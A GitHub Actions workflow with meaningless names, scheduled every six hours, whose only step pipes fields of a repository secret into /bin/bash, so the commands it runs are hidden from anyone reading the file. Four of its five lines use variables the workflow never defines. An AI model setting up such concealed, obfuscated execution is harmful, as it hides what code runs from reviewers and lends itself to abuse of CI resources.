name: gelinglanduo

on:
  workflow_dispatch:
  schedule:
    - cron: '40 5/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: gelinglanduo
        env:
          ilyu80: ${{ secrets.ilyu80 }}
        run: |
          echo $ilyu80 | jq -r .ac9908 | /bin/bash
          echo $p3 | jq -r .sqd36 | /bin/bash
          echo $oiqh1334 | jq -r .qxwa422 | /bin/bash
          echo $tm410 | jq -r .gyn2257 | /bin/bash
          echo $ibhh35 | jq -r .lvype78 | /bin/bash

